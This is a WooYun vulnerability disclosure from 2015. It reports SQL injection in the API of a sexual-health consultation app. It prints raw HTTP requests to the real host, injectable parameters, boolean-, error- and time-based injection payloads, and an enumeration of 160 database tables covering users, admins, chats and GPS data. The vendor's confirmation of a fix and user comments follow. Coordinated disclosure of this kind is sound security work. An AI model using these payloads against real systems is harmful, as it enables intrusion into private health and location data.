当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108400

漏洞标题:两性私人医生APP某处SQL注入漏洞(涉及300多万用户信息)

相关厂商:ranknowcn.com

漏洞作者: 几何黑店

提交时间:2015-04-16 17:03

修复时间:2015-06-01 14:18

公开时间:2015-06-01 14:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-16: 细节已通知厂商并且等待厂商处理中
2015-04-17: 厂商已经确认,细节仅向厂商公开
2015-04-27: 细节向核心白帽子及相关领域专家公开
2015-05-07: 细节向普通白帽子公开
2015-05-17: 细节向实习白帽子公开
2015-06-01: 细节向公众公开

简要描述:

两性私人医生APP SQL注入漏洞(涉及300多万用户信息)
~好羞涩~

详细说明:

POST /client/api.php?randnum=0.8167588198557496 HTTP/1.1
Content-Length: 417
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 
Mobile/10A5376e Safari/8536.25
Accept: */*
action=chatnow&doctorid=1&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user


参数:doctorid

POST /client/api.php?randnum=0.0867801399435848 HTTP/1.1
Content-Length: 361
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=login&number=1&password=e&ver=1.3


参数:number

POST /client/api.php?randnum=0.0867801399435848 HTTP/1.1
Content-Length: 362
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=login&number=e&password=admin&ver=1.3


参数:password

POST /api/m.php?randnum=0.8685849541798234 HTTP/1.1
Content-Length: 306
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=chatend&chatid=1


参数:chatid

POST /api/m.php?randnum=0.42485142801888287 HTTP/1.1
Content-Length: 356
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=login&password=e&username=e


参数:password

POST /api/m.php?randnum=0.3527681708801538 HTTP/1.1
Content-Length: 344
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=logout&userid=1


参数:userid

POST /api/m.php?randnum=0.42485142801888287 HTTP/1.1
Content-Length: 354
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=login&password=e&username=admin


参数:username

http://medapp.ranknowcn.com/client/image.php?key=e


参数:key

漏洞证明:

---
Parameter: doctorid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: action=chatnow&doctorid=-5475' OR 4249=4249#&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: action=chatnow&doctorid=-4478' OR 1 GROUP BY CONCAT(0x716a767671,(SELECT (CASE WHEN (1098=1098) THEN 1 ELSE 0 END)),0x71706b7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: action=chatnow&doctorid=1' AND (SELECT * FROM (SELECT(SLEEP(20)))GXDX)#&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user
---
web application technology: Nginx, PHP 5.3.5
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] lucky_draw
[*] medapp


Database: medapp
[160 tables]
+------------------------------+
| lucky_draw.user_bak1         |
| user                         |
| activedate                   |
| addrdetailLog                |
| admin                        |
| adminpage                    |
| advert                       |
| advertType                   |
| answer                       |
| appnews                      |
| assign_percentage            |
| bj_base_station              |
| booking                      |
| chat                         |
| chatFilterWords              |
| chatUpdLog                   |
| chatchange                   |
| chatclose                    |
| chatcomment                  |
| chathistory                  |
| chatlock                     |
| chatsourceLog                |
| chattag                      |
| chattemp                     |
| city                         |
| city2                        |
| city2LAC                     |
| city_baidu                   |
| cityhospital                 |
| cityhospital_keshi           |
| customerlock                 |
| dailyStatement               |
| doctor                       |
| doctorBak                    |
| doctor_autoAssignQuestion    |
| doctor_fastreply             |
| doctor_fastreplyParent       |
| frommsgLog                   |
| gps_addr                     |
| gps_addrtag                  |
| gps_cell                     |
| gps_imei                     |
| gps_ios_vars                 |
| gps_ios_vars_test            |
| gps_m7_data                  |
| gps_move_path                |
| gps_notes                    |
| gps_points                   |
| gps_points_test              |
| gps_pos                      |
| gps_raw_data                 |
| gps_user_pic                 |
| gps_walk_data                |
| gps_wifi                     |
| hospital                     |
| hospitalSellLog              |
| hospitalSellLog_day          |
| hospitalSellLog_month        |
| hospitalSellLog_oldData      |
| hospitalSellLog_sellPrice    |
| hospitalSellLog_updLog       |
| hospitalSellLog_userTelChat  |
| huodong                      |
| huodongReport                |
| importantChatLog             |
| ios_xyz                      |
| ios_xyz2                     |
| ios_xyz2_copy                |
| ios_xyz2_copy1               |
| ios_xyz2_copy2               |
| ios_xyz_feature              |
| ios_xyz_std                  |
| iospush                      |
| iospushmsg                   |
| iospushmsgTemplate           |
| iospushmsgType               |
| iptable                      |
| jihuo                        |
| jihuoCountForDate            |
| jihuo_macaddr                |
| logs_doctor                  |
| logs_doctorlogin             |
| logs_hospital                |
| logs_question                |
| logs_quotaQuetsionUserVerify |
| logs_users                   |
| meiapp_booking               |
| meiapp_category              |
| meiapp_comment               |
| meiapp_favor                 |
| meiapp_intro                 |
| meiapp_mm_offer              |
| meiapp_mm_photo              |
| meiapp_mm_vote               |
| meiapp_news                  |
| meiapp_news_catid            |
| meiapp_newscategory          |
| meiapp_picture               |
| meiapp_project               |
| meiapp_share                 |
| monthlyStatement             |
| office                       |
| online                       |
| publicQuestion               |
| qa_answer                    |
| qa_keyword                   |
| qa_question                  |
| qa_question_answer           |
| qa_type                      |
| question                     |
| questionCountForDate         |
| questionDayNum               |
| questionTop                  |
| questionType                 |
| questionTypeChild            |
| question_all                 |
| question_repeatLog           |
| questionhide                 |
| quotaHospital                |
| quotaQuestion                |
| quotaQuestion2               |
| quotaQuestionSearch          |
| quotaQuestionSearch_wuxiao   |
| quotaQuestion_copy           |
| quotaQuestion_test           |
| record                       |
| record_copy                  |
| regdate                      |
| retention                    |
| retention_week               |
| roles                        |
| sellLog                      |
| sina_weibo_access            |
| syslog                       |
| t_weibo_access               |
| tempCode                     |
| temp_questions               |
| test_activity                |
| uploadFile                   |
| user2                        |
| userAddrdetail               |
| userAlias                    |
| userBlacklist                |
| userContacts                 |
| userDeviceid                 |
| userLeaveWords               |
| userLog                      |
| userVisitLog                 |
| userYanzheng                 |
| user_copy                    |
| user_guahao                  |
| user_guahao_data             |
| user_huoyue                  |
| user_mobilemsg               |
| userhide                     |
| usersource                   |
| weeklyStatement              |
| z_qhp_sell_admin             |
| z_qhp_sell_log               |
| z_qhp_set_selled             |
+------------------------------+


QQ图片20150416164839.jpg

修复方案:

你懂的

版权声明:转载请注明来源 几何黑店@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-04-17 14:17

厂商回复:

感谢报告,上次清理,有些参数没有处理。现进行了全局传入参数过滤

最新状态:

暂无

漏洞评价:

评论

  1. 2015-04-16 17:05 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    这么多人都会聊什么让人羞羞的问题呢

  2. 2015-04-16 17:07 | 几何黑店 ( 核心白帽子 | Rank:1527 漏洞数:231 | 我要低调点儿.......)

    @浩天 请看这个你就知道有多羞羞了 WooYun: 两性私人医生某后台弱口令大量敏感用户信息泄露

  3. 2015-04-16 17:11 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    --

  4. 2015-04-16 17:26 | prolog ( 普通白帽子 | Rank:544 漏洞数:107 | 低调求发展)

    这个好吊

  5. 2015-04-16 23:35 | Ton7BrEak ( 普通白帽子 | Rank:211 漏洞数:43 | 吃苦耐劳,我只会第一个!)

    围观··

  6. 2015-04-17 14:23 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    官网都访问不上了。。。显示数据库错误,这是大整改的节奏啊!

  7. 2015-04-17 15:31 | Ton7BrEak ( 普通白帽子 | Rank:211 漏洞数:43 | 吃苦耐劳,我只会第一个!)

    @紫霞仙子 你访问错了~http://ranknowcn.com/ 试试这个~那个是他们以前的域名

  8. 2015-04-17 15:34 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    @Ton7BrEak 好可怕

  9. 2015-04-17 15:56 | Ton7BrEak ( 普通白帽子 | Rank:211 漏洞数:43 | 吃苦耐劳,我只会第一个!)

    @紫霞仙子 我也再说,厂商里面的地址都有问题。然后发现这里的又是com···

  10. 2015-04-20 11:36 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @浩天 私信表哥个QQ啊,以后主站审核找你啊~~~